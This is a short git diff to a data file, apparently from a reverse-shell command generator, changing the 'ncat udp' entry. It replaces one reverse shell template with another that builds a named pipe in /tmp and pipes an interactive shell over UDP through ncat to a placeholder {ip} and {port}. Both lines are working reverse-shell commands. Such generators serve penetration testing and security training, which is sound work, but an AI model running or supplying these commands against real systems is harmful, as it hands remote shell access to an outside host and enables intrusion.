diff --git a/js/data.js b/js/data.js index 5ecd0e7..185aed1 100644 --- a/js/data.js +++ b/js/data.js @@ -76,7 +76,7 @@ const reverseShellCommands = withCommandType( }, { "name": "ncat udp", - "command": "ncat {ip} {port} -e {shell}", + "command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|ncat -u {ip} {port} >/tmp/f", "meta": ["linux", "mac"] }, {